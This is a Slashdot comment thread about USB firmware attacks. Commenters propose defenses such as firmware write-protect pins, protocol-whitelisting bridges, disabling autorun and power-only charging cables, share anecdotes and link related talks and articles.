Anonymous Coward | about 3 months ago | (#47574833)

Add an extra pin to the device side connector. The pin is left unconnected on standard USB cables and firmware functions are disabled. Connect via a patch cable that swaps the data line for the patch line on the device side and the device will respond with firmware functions only, and disable regular operation.
This would effect an extremely cheap write protect switch. (after the chip redesign to accomodate the change)

Mom and Pop's heads would explode though, so it will never happen, but it seems technically feasible.
A usb bridge device that blocks firmware updates (via a protocol whitelist) would help in the interim. Not sure anything like that exists at the moment. (there are USB write blockers for use in forensics with mass storage devices. Presumably they could be adapted)

To say nothing of Apple cables (1)

gelfling (6534) | about 3 months ago | (#47574919)

Which are embedded entire computers.

To say nothing of your mother (1)

Anonymous Coward | about 3 months ago | (#47575209)

Who I embedded with my cable.

my bad experience (0)

Anonymous Coward | about 3 months ago | (#47574935)

Some years ago i was working at a major publicly traded company and corporate had requested a guy from our IT vendor do some maintenance on our servers. He requested access to our server room at which point I said no, but he escalated to my boss who allowed him to enter. Then he wanted access to our primary database server, to plug in a USB drive. I again said no, but the directive from corporate was to allow him to proceed. He plugged in his USB drive and I don't know why or how but the server immediately crashed and a hard drive had failed. It took us weeks to recover.

USB? Try that and everything else... (0)

Anonymous Coward | about 3 months ago | (#47575235)

"Trusted" hardware my ass! Has anyone even watched this presentation by Jacob Applebaum?:

https://www.youtube.com/watch?v=dy3-QZLTpbQ

(includes talk about USB chip replacements for spyware purposes)

Still better than Firewire (0)

Anonymous Coward | about 3 months ago | (#47575395)

Still better than Firewire's direct external access your system's memory.

The very first thing I do is disable autorun (1)

Trax3001BBS (2368736) | about 3 months ago | (#47575471)

Mainly because it's the first asking for access(Windows), I just no everything out. One of the largest security holes around and it's still fully active.

Give up complete computer security because I want music to play seconds before I could do it myself.

Do cellphone chargers require USB negotiation? (1)

smellsofbikes (890263) | about 3 months ago | (#47575487)

The most obvious route for disaster is a compromised cellphone charger, at least for my usage patterns. Since it'd take me about ten minutes to make a pez-candy-sized PCB with USB-micro-M and USB-micro-F connectors with only the power lines connected between them, I'm wondering if an android phone will charge when it's getting power, regardless of whether the USB is connected, or it won't charge until it's had a USB chat. I recall older devices being able to charge at lower-power (150mA?) but having to negotiate for 500mA. I'm perfectly happy to settle for 150mA for right now, until I can program a little AVR to fake the negotiation process and make me an air-gap charger. I don't have a usb traffic sniffer at work, and am about to lose my pcb fabrication equipment for a couple of weeks, so if I could find out today if it's worth making the pcb I'd do it this afternoon. Anyone know?

Re:Do cellphone chargers require USB negotiation? (1)

blueg3 (192743) | about 3 months ago | (#47575523)

You just need a resistor or two. Almost any USB-charged device will charge at 500 mA if it is connected to a dumb charger (no data lines), but in order to charge at a higher current (as many devices do), it needs to sense that it's connected to a charger that supports the higher current draw. So that it can be implemented without real USB-supporting electronics, that's just done with some simple electrical components. So you can make a charger that blocks the data lines but permits full-speed charging.

If you're okay with the slow version, just go out and buy a "power only" USB cable. They already exist. Alternately, this [int3.cc] .

This sounds familiar... article from December 2012 (1)

EnOne (786812) | about 3 months ago | (#47575549)

The USB stick that thinks it’s a keyboard Read more: The USB stick that thinks it’s a keyboard PC Pro blog http://www.pcpro.co.uk/blogs/2... [pcpro.co.uk]
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?